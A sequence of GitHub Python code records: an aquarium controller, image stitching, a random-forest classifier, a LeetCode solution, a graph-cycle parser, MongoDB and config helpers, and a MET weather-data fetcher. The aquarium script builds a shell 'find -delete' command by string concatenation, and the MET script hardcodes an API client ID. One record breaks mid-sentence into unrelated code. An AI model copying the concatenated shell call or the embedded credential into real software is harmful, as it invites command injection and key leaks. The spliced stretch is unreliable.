os.system(\"find \" + path + \" -mtime +30 -delete\")\n\n\n# --Initialize Logging\nlogtime = time.strftime(\"%Y-%m-%d\")\nlogging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S',\n                    filename=\"log/\" + logtime + \"_Server-RaspberryAQ.log\", level=logging.INFO)\nlogging.info('Server-RaspberryAQ Started!')\nprint(f\"{bcolors.OKGREEN}Server-RaspberryAQ Started!{bcolors.ENDC}\")\ntime.sleep(5)\n\n# --Temp-Function\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\n\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n
\n\ndef read_temp_raw():\n    f = open(device_file, 'r')\n    lines = f.readlines()\n    f.close()\n    return lines\n\n\ndef read_temp():\n    lines = read_temp_raw()\n    while lines[0].strip()[-3:] != 'YES':\n        time.sleep(0.2)\n        lines = read_temp_raw()\n    equals_pos = lines[1].find('t=')\n    if equals_pos != -1:\n        temp_string = lines[1][equals_pos+2:]\n        temp_c = float(temp_string) / 1000.0\n        return temp_c\n\n\n\"\"\"\n# For debug without temp sensor\ndef read_temp():\n    temp_c = 25.00\n    return temp_c\n\"\"\"\n\n# --Initialize JSON structure\ndata_RaspberryAQ = {}\n# Controller_RaspberryAQ = {}\n\n# --Functions End\n\n\n# --Read Input File\ntry:\n    aq_main_light_on = load_controller_input(\"aq_main_light_on\")\n    aq_main_light_off = load_controller_input(\"aq_main_light_off\")\n    aq_co2_on = load_controller_input(\"aq_co2_on\")\n    aq_co2_off = load_controller_input(\"aq_co2_off\")\n    aq_temp = load_controller_input(\"aq_temp\")\n    # Reads the time at which the input file was saved\n    lastinputtime = load_controller_input(\"timestamp\")\n\n    logging.info('Inputfile imported')\n\n    aq_temp = float(aq_temp)\n\n# --Reads the MYSQL Information\n    useMYSQL = load_controller_mysql(\"useMYSQL\")\n    if(useMYSQL == 'True'):\n        host = load_controller_mysql(\"HOST\")\n        user = load_controller_mysql(\"USERNAME\")\n        passwd = load_controller_mysql(\"PASSWD\")\n        database = load_controller_mysql(\"DBNAME\")\n        Controller_ID = load_controller_mysql(\"CONTROLLERID\")\n        logging.info('MYSQL Infos imported')\n        print(f\"{bcolors.OKGREEN}MYSQL Infos imported{bcolors.ENDC}\")\n\n\nexcept:\n    print(f\"{bcolors.WARNING}Warning: Inputfile couldn't be found!{bcolors.ENDC}\")\n    print(f\"{bcolors.WARNING}Shutting down RaspberryAQ-Server!{bcolors.ENDC}\")\n    logging.warning(\"Data: Inputfile couldn't be found!\")\n    exit()\n\n\nwhile True:\n\n    # ---Get Times\n    daytime = time.strftime(\"%H:%M\")\n    date = time.strftime(\"%d.%m.%Y\")\n    datatime = time.strftime(\"%Y-%m-%d\")\n    fulltime = time.strftime(\"%d.%m.%Y %H:%M:%S\")\n\n\n# ---Light switching\n\n    if(daytime >= aq_main_light_on and daytime <= aq_main_light_off):\n        GPIO.output(mainlight_relay, GPIO.LOW)\n        aq_main_light_status = \"On\"\n        logging.info('Mainlight is switched on')\n    else:\n        GPIO.output(mainlight_relay, GPIO.HIGH)\n        aq_main_light_status = \"Off\"\n        logging.info('Mainlight is switched off')\n\n# ---CO2 switching\n\n    if(daytime >= aq_co2_on and daytime <= aq_co2_off):\n        GPIO.output(co2_relay, GPIO.LOW)\n        aq_co2_status = \"On\"\n        logging.info('CO2 is switched on')\n\n    else:\n        GPIO.output(co2_relay, GPIO.HIGH)\n        aq_co2_status = \"Off\"\n        logging.info('CO2 is switched off')\n\n# ---Temp switching\n\n    aq_temp_sen = read_temp()\n\n    if(aq_temp_sen <= aq_temp):\n        GPIO.output(heater_relay, GPIO.LOW)\n        aq_heater_status = \"On\"\n        logging.info('Heater is switched on')\n    else:\n        GPIO.output(heater_relay, GPIO.HIGH)\n        aq_heater_status = \"Off\"\n        logging.info('Heater is switched off')\n\n\n# ---Output\n# --Terminal output\n    print(f\"{bcolors.HEADER}---Controller Values---{bcolors.ENDC}\")\n    print(f\"{bcolors.OKBLUE}--Date and Time--{bcolors.ENDC}\")\n    print(\"Date and Daytime: \", date, daytime)\n    print(\"Fulltime: \", fulltime)\n    print(f\"{bcolors.OKBLUE}--Light--{bcolors.ENDC}\")\n    print(\"Target time light on\", aq_main_light_on,\n          \"and light off\", aq_main_light_off)\n    print(\"Light status: \", aq_main_light_status)\n\n    print(f\"{bcolors.OKBLUE}--CO2--{bcolors.ENDC}\")\n    print(\"Target time CO2 on\", aq_co2_on, \"and CO2 off\", aq_co2_off)\n    print(\"CO2 status: \", aq_co2_status)\n
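`read_temp` above parses the two-line `w1_slave` text that the `w1-therm` kernel driver exposes for a DS18B20 sensor. The same parsing on a canned sample (the byte values are illustrative):

```python
# Parsing a sample w1_slave payload: line 0 carries the CRC status, line 1
# carries the raw temperature in thousandths of a degree after "t=".
sample = ["72 01 4b 46 7f ff 0e 10 57 : crc=57 YES",
          "72 01 4b 46 7f ff 0e 10 57 t=23125"]
equals_pos = sample[1].find("t=")
temp_c = float(sample[1][equals_pos + 2:]) / 1000.0
assert temp_c == 23.125
```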
\n    print(f\"{bcolors.OKBLUE}--Temperature--{bcolors.ENDC}\")\n    print(\"Current temperature:\", aq_temp_sen)\n    print(\"Heater status: \", aq_heater_status)\n\n    print(f\"{bcolors.OKBLUE}--Other information--{bcolors.ENDC}\")\n\n# --SQL output\n\n    if(useMYSQL == 'True' and loopcountermysql >= writetomysql):\n        try:\n            mydb = mysql.connector.connect(  # Opens the MYSQL Connection\n                host=host,\n                user=user,\n                passwd=passwd,\n                database=database\n            )\n\n            mycursor = mydb.cursor()\n\n            sql = \"INSERT INTO aq_controller (Controller_ID, aq_timestamp, aq_mainlight, aq_temp, aq_heater, aq_co2_dosing) VALUES (%s, %s, %s, %s, %s, %s)\"\n            val = (Controller_ID, fulltime, aq_main_light_status,\n                   aq_temp_sen, aq_heater_status, aq_co2_status)\n            mycursor.execute(sql, val)\n            mydb.commit()\n\n            print(f\"{bcolors.OKGREEN}Values are written to MYSQL Database{bcolors.ENDC}\")\n            #print(mycursor.rowcount, \"record inserted.\")\n            logging.info(\"MYSQL: Values are written to MYSQL Database\")\n\n            mydb.close()  # Closes the MYSQL Connection\n\n        except:\n            print(f\"{bcolors.WARNING}MYSQL: Couldn't connect to MYSQL Database{bcolors.ENDC}\")\n            logging.warning(\"MYSQL: Couldn't connect to MYSQL Database\")\n            pass\n\n        loopcountermysql = 0\n\n# --Data File Output\n\n    # try to Update JSON\n    try:\n        if(varread==True):\n            dataJSON = open(\"data/\" + datatime + \"_data_RaspberryAQ.json\")\n            controllerinput = json.load(dataJSON)\n            JSONnode = controllerinput['data']\n\n            # print(JSONnode)\n            with open(\"data/\" + datatime + \"_data_RaspberryAQ.json\", 'w') as f:\n\n                data_RaspberryAQ = {\n\n\n                    \"timestamp\": fulltime,\n                    \"aq_mainlight_status\": aq_main_light_status,\n                    \"aq_co2_status\": aq_co2_status,\n                    \"aq_heater_status\": aq_heater_status,\n                    \"aq_temp_sen\": aq_temp_sen\n\n\n                }\n                #z = json.load(JSONnode)\n                JSONnode.append(data_RaspberryAQ)\n\n                json.dump(controllerinput, f, indent=4, sort_keys=True)\n\n    # create JSON file\n    except Exception:\n        writeDataFile(datatime, fulltime, aq_main_light_status,\n                      aq_co2_status, aq_heater_status, aq_temp_sen)\n        varread = False\n\n# ---Delete old files\n    if(daytime >= \"23:58\" and daytime <= \"23:59\"):\n        print(\"Deleting files older than 30 days\")\n        directory1 = 'log/*.log'\n        directory2 = 'data/*_data_RaspberryAQ.json'\n\n        DelOldFiles(directory1)\n        DelOldFiles(directory2)\n        \n\n# ---Check for new input file\n    if(loopcounterinput >= checkinputfile):\n        print(\"Check for new Input file\")\n        logging.info('Checking for new Input file.')\n        try:\n            inputtime = load_controller_input(\"timestamp\")\n        except:\n            print(\n                f\"{bcolors.WARNING}Warning: Inputfile couldn't be found!{bcolors.ENDC}\")\n            print(f\"{bcolors.WARNING}Running with old config.{bcolors.ENDC}\")\n            logging.warning(\"Data: Inputfile couldn't be found!\")\n\n        if(datetime.strptime(inputtime, \"%d.%m.%Y %H:%M:%S\") > datetime.strptime(lastinputtime, \"%d.%m.%Y %H:%M:%S\")):\n            aq_main_light_on = load_controller_input(\"aq_main_light_on\")\n            aq_main_light_off = load_controller_input(\"aq_main_light_off\")\n            aq_co2_on = load_controller_input(\"aq_co2_on\")\n            aq_co2_off = load_controller_input(\"aq_co2_off\")\n            aq_temp = load_controller_input(\"aq_temp\")\n            aq_temp = float(aq_temp)\n            lastinputtime = load_controller_input(\"timestamp\")\n\n            useMYSQL = load_controller_mysql(\"useMYSQL\")\n            if(useMYSQL == 'True'):\n                host = load_controller_mysql(\"HOST\")\n                user = load_controller_mysql(\"USERNAME\")\n                passwd = load_controller_mysql(\"PASSWD\")\n                database = load_controller_mysql(\"DBNAME\")\n                Controller_ID = load_controller_mysql(\"CONTROLLERID\")\n
                logging.info('MYSQL Infos imported')\n                print(f\"{bcolors.OKGREEN}MYSQL Infos imported{bcolors.ENDC}\")\n\n            print(f\"{bcolors.OKGREEN}Inputfile updated!{bcolors.ENDC}\")\n            logging.info('Inputfile updated!')\n\n        loopcounterinput = 0\n\n# ---Loop counters\n    loopcounterinput = loopcounterinput + 1\n    loopcountermysql = loopcountermysql + 1\n\n# ---Delay\n    time.sleep(sleeptime)\n\n# ---Beauty-Command\n    os.system('clear')  # Disable for debug\n","repo_name":"puchtuning/RaspberryAQ-Controller","sub_path":"Server-AQ-controller.py","file_name":"Server-AQ-controller.py","file_ext":"py","file_size_in_byte":11441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}{"seq_id":"70153617390","text":"import cv2\nimport numpy as np\n\n# Compute the homography matrix\ndef get_homo(img1,img2):\n    # pass\n    # # Convert to grayscale first\n    # gray1=cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n    # gray2=cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\n    # Create the SIFT feature detector\n    sift=cv2.xfeatures2d.SIFT_create()\n\n    # Compute keypoints and descriptors\n    kp1,des1=sift.detectAndCompute(img1,None)\n    kp2,des2=sift.detectAndCompute(img2,None)\n    # Create the feature matcher\n    bf = cv2.BFMatcher(cv2.NORM_L1)\n    match = bf.knnMatch(des1, des2,k=2)\n    # Filter the matches and keep only the valid ones\n    verify_ratio=0.8\n    verify_matches=[]\n    for m1,m2 in match:\n        if m1.distance <0.8*m2.distance:\n            verify_matches.append(m1)\n    # Find the homography matrix\n    if len(verify_matches)>=4:\n        img1_pts=[]\n        img2_pts=[]\n        for m in verify_matches:\n            img1_pts.append(kp1[m.queryIdx].pt)\n            img2_pts.append(kp2[m.trainIdx].pt)\n        img1_pts=np.float32(img1_pts).reshape(-1,1,2)\n        img2_pts = np.float32(img2_pts).reshape(-1, 1, 2)\n        H,_=cv2.findHomography(img1_pts,img2_pts,cv2.RANSAC,5.0)\n        return H\n    else:\n        print('err:Not enough matches...')\n        exit()\n\n# Stitch the images\ndef stitch_image(img1,img2,H):\n    # 1. Get the 4 corner points of each image\n    # 2. Transform the image (rotate/translate it with the matrix)\n    # 3. Create a large canvas and paste the two small images onto it\n    # Get the height and width of the source images\n    h1,w1=img1.shape[:2]\n    h2, w2 = img2.shape[:2]\n    # Four corner points\n    img1_dims=np.float32([[0,0],[0,h1],[w1,h1],[w1,0]]).reshape(-1,1,2)\n    img2_dims = np.float32([[0, 0], [0, h2], [w2, h2], [w2, 0]]).reshape(-1, 1, 2)\n    # Transform the image corners\n    img1_transform = cv2.perspectiveTransform(img1_dims, H)\n    # print(img1_dims)\n    # print(img2_dims)\n    # print(img1_transform)\n    # Find the min and max values, to size the large canvas\n    result_dims=np.concatenate((img2_dims,img1_transform),axis=0)\n    #print(result_dims)\n    [x_min,y_min]=np.int32(result_dims.min(axis=0).ravel()-0.5)\n    [x_max, y_max] = np.int32(result_dims.max(axis=0).ravel() + 0.5)\n    # Translation distance\n    transform_dist=[-x_min,-y_min]\n    # Build the translation matrix\n    transform_array=np.array([[1,0,transform_dist[0]],\n                              [0,1,transform_dist[1]],\n                              [0,0,1]])\n\n    # Perspective warp; transform_array.dot(H) applies the translation as well\n    result_img=cv2.warpPerspective(img1,transform_array.dot(H),(x_max-x_min,y_max-y_min))\n    # Paste img1 and img2 together\n    result_img[transform_dist[1]:transform_dist[1]+h2,transform_dist[0]:transform_dist[0]+w2]=img2\n\n    return result_img\n\n\n\n# Read the images\nimg1=cv2.imread('1.png') #\nimg2=cv2.imread('2.png') #\n\nimg1=cv2.resize(img1,(480,360))\nimg2=cv2.resize(img2,(480,360))\ninputs=np.hstack((img1,img2))\n\n# Homography matrix\nH=get_homo(img1,img2)\n\n# Stitch the images\nrst_img=stitch_image(img1,img2,H)\n\n#cv2.imshow('hh',inputs)\ncv2.imshow('aa',rst_img)\n\n# # Convert to grayscale first\n# gray1=cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n# gray2=cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\n\n# # Find the homography matrix\n# if len(good)>=4:\n# srcPts=np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1,1,2)\n# dstPts=np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1,1,2)\n# H,_=cv2.findHomography(srcPts,dstPts,cv2.RANSAC,5.0)\n# # Perspective transform\n# h,w=img1.shape[:2]\n# pts=np.float32([[0,0],[0,h-1],[w-1,h-1],[w-1,0]]).reshape(-1,1,2)\n
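`stitch_image` above sizes the output canvas from the min/max of the transformed corner points. The same NumPy step on toy corner data, following the `(-1, 1, 2)` shape convention used in the stitching code:

```python
import numpy as np

corners = np.float32([[0, 0], [0, 360], [480, 360], [480, 0]]).reshape(-1, 1, 2)
x_min, y_min = np.int32(corners.min(axis=0).ravel() - 0.5)
x_max, y_max = np.int32(corners.max(axis=0).ravel() + 0.5)
assert (x_max - x_min, y_max - y_min) == (480, 360)
```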
# dst=cv2.perspectiveTransform(pts,H)\n#\n# cv2.polylines(img2,[np.int32(dst)],True,(0,0,255))\n# else:\n# exit()\n#\n#\n# img3=cv2.drawMatchesKnn(img1,kp1,img2,kp2,[good],None)\n#\n# cv2.imshow('search',img3)\n\nkey=cv2.waitKey(0)\nif(key & 0xFF == ord('q')):\n    exit()\ncv2.destroyAllWindows()\n","repo_name":"fivexxxxx/opencv_python","sub_path":"图像拼接/images_stitch.py","file_name":"images_stitch.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"24236739430","text":"# Importing a few libraries first\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\ndataset = pd.read_csv('/kaggle/input/breast-cancer-wisconsin-benign-or-malignant/tumor.csv')\n\n# Printing first 5 rows\ndataset.head()\n\n# Fetching info about the dataset\ndataset.info()\n\n# Separating the features and labels\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values  # The last column has the label value\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\nfeature_scaling = StandardScaler()\nX_train = feature_scaling.fit_transform(X_train)\nX_test = feature_scaling.transform(X_test)\n\nrand_for = RandomForestClassifier(n_estimators = 10, max_depth = 5 ,criterion = 'entropy', random_state = 0)\nrand_for.fit(X_train, y_train)\n\n\n\ny_pred = rand_for.predict(X_test)\n\ncm = confusion_matrix(y_test, y_pred)\nprint(cm)\naccuracy_score(y_test, y_pred)\n\n\n\noutput = pd.DataFrame({'Real_class': y_test, 'Predicted_class': y_pred})\n\n\n\noutput.head()\n\noutput.to_csv('breast_cancer.csv', index=False)\nprint(\"Submission was successfully saved!\")","repo_name":"hitblunders/supervised-learning","sub_path":"breast_cancer.py","file_name":"breast_cancer.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"70132314992","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 13:10:29 2018\n\n@author: hecongcong\n\"\"\"\n'''\nThe question 350: Intersection of Two Arrays II\n    Given two arrays, write a function to compute their intersection.\n\nExample1:\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\nOutput: [2,2]\n\nExample2:\nInput: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\nOutput: [4,9]\n\nNote:\n1. Each element in the result should appear as many times as it shows in both arrays.\n2. The result can be in any order.\n'''\n\n'''\nThe answer: the problem gives two arrays and asks for their intersection,\nkeeping every occurrence of an element that appears in both arrays.\nApproach:\nSort both arrays in ascending order to produce order_nums1 and order_nums2,\nthen set two pointers idx1 and idx2 pointing at the start of each sorted array.\nThen loop over both arrays; there are three cases, as follows:\n1. When order_nums1[idx1] == order_nums2[idx2], append the element to the result and advance both pointers by one.\n2. When order_nums1[idx1] ',string)\r\n    stuff2 = re.findall('[0-9]+ -> ([^ ]*)',string) #this is useful for data parsing\r\n    stuff1 = stuff1[0]\r\n    stuff2 = stuff2[0].split(',')\r\n    A[stuff1] = stuff2\r\n\r\nkey = str(random.randint(0,len(A)-1))\r\nlst = [key]\r\ndef Cycle(key):\r\n    while True:\r\n        if A[key] == []:\r\n            break\r\n        else:\r\n            n = random.randint(0,len(A[key])-1)\r\n            lst.append(A[key][n])\r\n            key1 = key\r\n            key = A[key][n]\r\n            A[key1].remove(A[key1][n])\r\nCycle(key)\r\n\r\ndef Checker(lst):\r\n    for key in lst:\r\n        if A[key]!=[]:\r\n            return 1\r\n\r\nwhile Checker(lst) == 1: \r\n    for key in lst:\r\n        
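The intersection record's own implementation is cut off above, so here is a sketch of the two-pointer method its explanation describes: sort both arrays, advance the pointer at the smaller value, and collect equal elements. It is checked against the two examples from the problem statement:

```python
def intersect(nums1, nums2):
    a, b = sorted(nums1), sorted(nums2)
    i = j = 0
    result = []
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            result.append(a[i])  # element present in both: keep it
            i += 1
            j += 1
        elif a[i] < b[j]:
            i += 1               # advance the pointer at the smaller value
        else:
            j += 1
    return result

assert intersect([1, 2, 2, 1], [2, 2]) == [2, 2]
assert sorted(intersect([4, 9, 5], [9, 4, 9, 8, 4])) == [4, 9]
```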
{"seq_id":"22706686320","text":"import pymongo\nfrom config import config\n\n\nclass SongModel(object):\n    def __init__(self):\n        connection = pymongo.MongoClient(\n            config['default'].MONGODB_SERVER,\n            config['default'].MONGODB_PORT\n        )\n        db = connection[config['default'].MONGODB_DB]\n        self.collection = db[config['default'].MONGODB_COLLECTION]\n\n    def get_items(self):\n        items = []\n        for item in self.collection.find():\n            # print(item)\n            if item['name'] is not None:\n                items.append(item['name'])\n        return items\n\n    def get_item(self, name):\n        item = self.collection.find_one({'name':name})\n        if(item):\n            return item\n        else:\n            return ''\n\n    def put_item(self, dic):\n        self.collection.find_one_and_update({'name':dic['name']},\n                                            {'$set':{'url':dic['url'],\n                                                     'lrc':dic['lrc']}},\n                                            upsert=True)\n        # self.collection.find_one_and_update()\n        # if(res):\n        #     self.collection.update()\n        # self.collection.insert({'name':dic['name'],'url':dic['url']})\n\n    def remove_item(self, name):\n        self.collection.remove({'name':name})\n\nif __name__ == '__main__':\n    song2 = {'name':'Danielle Delaite-Love Sex Goddess.mp3',\n             'url':'/home/magicyang/Music/Danielle Delaite-Love Sex Goddess.mp3',\n             'lrc':'/home/magicyang/Music/Danielle Delaite-Love Sex Goddess.lrc'}\n    sm = SongModel()\n    sm.put_item(song2)\n    item = sm.get_item(song2['name'])\n    song_list = sm.get_items()\n    print(song_list)\n    # sm.remove_item(song2['name'])\n    # song_list = sm.get_items()\n    # print(song_list)\n\n","repo_name":"wangduanyang/MusicPlayer","sub_path":"SongModel.py","file_name":"SongModel.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
{"seq_id":"41441048691","text":"#!/usr/bin/python3\n\nimport argparse\n\n\ndef land_parse(s):\n    lands = {}\n    # example: a:3 b:10 c:231\n    for item in s:\n        land, coef = item.split(':')\n        lands[land] = int(coef)\n    return lands\n\n\ndef wall_coef_parse(s):\n    # example: 2,3:4 1,1:53\n    wall_dict = {}\n    for w in s:\n        koord, k = w.split(':')\n        i, j = koord.split(',')\n        wall_dict[(int(i), int(j))] = int(k)\n    return wall_dict\n\n\ndef exit_parse(s):\n    ans = []\n    for item in s:\n        i, j = item.split(',')\n        ans.append((int(i), int(j)))\n    return ans\n\n\ndef add_args(parser):\n    parser.add_argument('-b', '--bombs',\n                        help='maximum amount of bombs', default=0, type=int)\n\n    parser.add_argument('-f', '--inputfile',\n                        help='labyrinth file name. it contains: '\n                             'w - inner walls, '\n                             'x - outer walls, '\n                             '* - start, '\n                             '. 
- finish (exit from labyrinth)'\n '\\' \\' - free place\\')')\n\n parser.add_argument('-a', '--alpha',\n help='coefficient to choose characteristic '\n 'of minimal way; '\n 'function=alpha*bombs+(1-alpha)*steps',\n default=0, type=float)\n\n parser.add_argument('-e', '--exits',\n help='cells with exits,format:(i,j); '\n \"it also can be added in labyrinth as '.'\",\n nargs='*', default=[])\n\n parser.add_argument('-s', '--starts',\n help='cells with initial position, '\n 'format: (i,j); '\n \"it also can be added in labyrinth as '*'\",\n nargs='*', default=[])\n\n parser.add_argument('-l', '--lands', nargs='*', type=str, default={},\n help='cells with not standard speed to go; '\n 'format: c,k; '\n 'where k is coef of speed and c is the symbol '\n 'in labyrinth for this land type')\n\n parser.add_argument('-w', '--walls', nargs='*', type=str, default=[],\n help='walls with K bombs to damage; format: '\n 'i,j:k where k is amount of bombs')\n\n parser.add_argument('--timebomb', help='time to use 1 bomb',\n type=int, default=0)\n\n parser.add_argument('-o', '--output',\n help=\"you can choose 'wasd', \"\n \"'on_lab' and 'text' - point out it with \",\n type=str, default='on_lab')\n parser.add_argument('-g', '--generator',\n help=\"when yot input labyrinth from generator \"\n \"with additional information\",\n action='store_true')\n\n\ndef parse_input(labth):\n parser = argparse.ArgumentParser('labyrinth')\n add_args(parser)\n args = parser.parse_args()\n labth.filename = None\n labth.filename = args.inputfile\n labth.bombs = args.bombs\n labth.finish = exit_parse(args.exits)\n labth.alpha = args.alpha\n labth.timebomb = args.timebomb\n labth.start = args.starts\n labth.landtypes = land_parse(args.lands)\n labth.kwalls = wall_coef_parse(args.walls)\n labth.output_type = args.output\n if args.generator:\n labth.generator_input = True\n return labth\n\n\ndef correct_input(labth):\n if labth.filename:\n try:\n with open(labth.filename, 'r') as labyrinth:\n pass\n except (FileNotFoundError, FileExistsError) as e:\n raise ValueError(\"No such file or directory: \" + labth.filename)\n # sys.stderr.write(\"No such file or directory: \" + labth.filename)\n return False\n\n for coord, k in labth.kwalls.items():\n i, j = coord\n if labth.lab[i][j] != 'w' or k < 0:\n raise ValueError(\"Incorrect Argument: walls\")\n return False\n\n for symbol, k in labth.landtypes.items():\n if len(symbol) > 1 or k < 0:\n raise ValueError(\"Incorrect Argument: land types\")\n return False\n\n if not 0 <= labth.alpha <= 1:\n raise ValueError(\"Incorrect Argument: alpha should be in [0,1]\")\n return False\n\n if labth.bombs < 0:\n raise ValueError(\"Incorrect Argument: bombs should be positive number\")\n return False\n\n if labth.timebomb < 0:\n raise ValueError(\"Incorrect Argument: \"\n \"time to make bomb should be positive number\")\n return False\n\n if labth.output_type not in ('on_lab', 'wasd', 'text'):\n raise ValueError(\"Incorrect output type: \"\n \"should be \\'wasd\\', \\'on_lab\\' or \\'text\\'\")\n return False\n\n return True\n","repo_name":"Frankmayerr/labyrinth","sub_path":"modules/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23585253778","text":"# -*- coding: utf-8 -*-\n\"\"\"Module for loading JSON configuration.\"\"\"\n\nimport json\nimport os\n\n_path = os.path.abspath(__file__)\n_dir_path = os.path.dirname(_path)\n\nCONFIG_EXT = \".json\"\nCONFIG_DIR = 
\"config\"\nCONFIG_PATH = os.getenv(\n 'PARKER_CONFIG',\n os.path.join(\n _dir_path,\n CONFIG_DIR\n )\n)\nCONFIG_SITES_PATH = 'sites'\n\n\ndef _load_config_json(file_path):\n \"\"\"Load the passed file as JSON.\"\"\"\n return json.load(open(file_path))\n\n\ndef load_config(name):\n \"\"\"Load and return configuration as a dict.\"\"\"\n return _load_config_json(\n os.path.join(\n CONFIG_PATH,\n name + CONFIG_EXT\n )\n )\n\n\ndef load_site_config(name):\n \"\"\"Load and return site configuration as a dict.\"\"\"\n return _load_config_json(\n os.path.join(\n CONFIG_PATH,\n CONFIG_SITES_PATH,\n name + CONFIG_EXT\n )\n )\n","repo_name":"nefarioustim/parker","sub_path":"parker/configloader.py","file_name":"configloader.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"28999511015","text":"import tensorflow as tf\nimport numpy as np\nimport keras\nimport Model\nimport PIL.Image as Image\nimport argparse\nimport matplotlib.pyplot as plt\nimport time\nimport Generator\nimport librosa\nimport Generator\n\nparser = argparse.ArgumentParser(description='Sound texture expansion. Test phase')\nparser.add_argument('image1', type=str, help='audio name')\nparser.add_argument('--Iter', type=int, default=1000, required=False, help='number of iterations to run.')\nparser.add_argument('--layer_D', type=int, default=4, help='number of deep layers')\nparser.add_argument('--Adam', type=int, default=0, help='use Adam|Rmsprop')\nparser.add_argument('--mean', type=int, default=0, help='use mean|Gram')\nparser.add_argument('--Model', type=int, default=2, help='which model')\nparser.add_argument('--inner', type=int, default=10, help='number of Langevin steps in each iteration')\nparser.add_argument('--Gau', type=float, default=0.0, help='Gaussian penalty')\nparser.add_argument('--sn', type=float, default=0, help='Fourier norm penalty')\nparser.add_argument('--diversity', type=str, default='No', help='diversity penalty in which layer')\nparser.add_argument('--d_weight', type=float, default=0, help='diversity penalty')\nparser.add_argument('--step', type=int, default=0, help='which model to use')\n\nargs = parser.parse_args()\n\nimg_nrows = 24576\n\nx = Generator.pyramid_tf(img_nrows * 5, 8, 1, is_training=False)\n\n\nsaver = tf.train.Saver()\nsess = tf.Session()\n\nsave_name = args.image1 + '_depth_' + str(args.layer_D) + \\\n\t\t\t'_inner_' + str(args.inner) + '_IsMean_' + str(args.mean) + '_Adam_' + str(args.Adam) + \\\n\t\t\t'_Gau_' + str(args.Gau) + '_diversity_' + args.diversity + '_d_weight_' + str(args.d_weight)\n\ncheckpoint_dir = './Saved_model/' + save_name + '/' + '-' + str(args.step)\nsaver.restore(sess, checkpoint_dir)\n\nout = sess.run(x)\n\narg_dir = './Saved_model/' + save_name + '/'\nm, M, fs = np.load(arg_dir + 'args.npy')\nfs = int(fs)\n\ntmp = np.clip(out[0], -1, 1)\n\ntmp = (tmp + 0.5) * (M - m) + m\n\nlibrosa.output.write_wav('Produce_Generator/' + save_name + '.wav', tmp, fs)\n\n","repo_name":"wzm2256/cgCNN","sub_path":"sound_expansion/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"2411155499","text":"###\n# retrieves precipitation data from MET stations for a set of dates and times\n# and stores it in .xlsx format\n###\n\nimport numpy as np\nfrom netCDF4 import Dataset \nimport pandas as pd\nimport datetime\nimport requests\nimport xarray as xr\nfrom utils 
import date_to_string, get_period\n\ndef get_MET_data(station, data, period):\n # retrieves desired \"data\" during \"period\" from a given MET \"station\"\n # by accessing MET's Frost API\n \n client_id = '3695f017-f71e-43bc-b3e0-8a0fb90c2608'\n endpoint = 'https://frost.met.no/observations/v0.jsonld'\n parameters = {\n 'sources': station, \n 'elements': data, \n 'referencetime': period,\n }\n\n # Issue GET request\n r = requests.get(endpoint, parameters, auth=(client_id,''))\n print(\"Issued GET request to frost API...\")\n # Extract JSON data\n json = r.json()\n\n if r.status_code == 200:\n data = json['data']\n print('Data retrieved from frost.met.no!')\n else:\n print('Error! Returned status code %s' % r.status_code)\n print('Message: %s' % json['error']['message'])\n print('Reason: %s' % json['error']['reason'])\n\n # This will return a Dataframe with all of the observations in a table format\n df = pd.DataFrame()\n for i in range(len(data)):\n row = pd.DataFrame(data[i]['observations'])\n row['referenceTime'] = data[i]['referenceTime']\n row['sourceId'] = data[i]['sourceId']\n df = df.append(row)\n\n # Retain the following columns\n columns = ['sourceId','referenceTime','elementId','value','unit','timeOffset', 'timeResolution']\n df2 = df[columns].copy()\n # Convert the time value to datetime\n df2['referenceTime'] = pd.to_datetime(df2['referenceTime'],utc=True)\n\n return df2\n\ndef run(y, m, d): \n pd.set_option('display.expand_frame_repr', False)\n period = get_period(y, m)\n y, m, d = date_to_string(y, m, d)\n ds = xr.open_dataset(f'data/Radiosonde/andoya/{y}/andoya_' + period + '.nc')\n data_rs = ds.to_dataframe()\n sample_time = [tuple[0]+tuple[1] for tuple in data_rs.index]\n start_time_cm = data_rs.index.get_level_values(0)\n sid = start_time_cm\n data_rs.insert(1, 'sampleseries_id', sid)\n data_rs.insert(0, \"UTC time\", sample_time)\n\n # get the radiosonde data for the day of interest:\n dates = pd.to_datetime(data_rs['sampleseries_id']).dt.date\n desired_date = datetime.date(year=int(y), month=int(m), day=int(d))\n idx = (dates == desired_date)\n \n if len(idx[idx == True]) == 0:\n print(f\"Error: Unavailable radiosonde data for 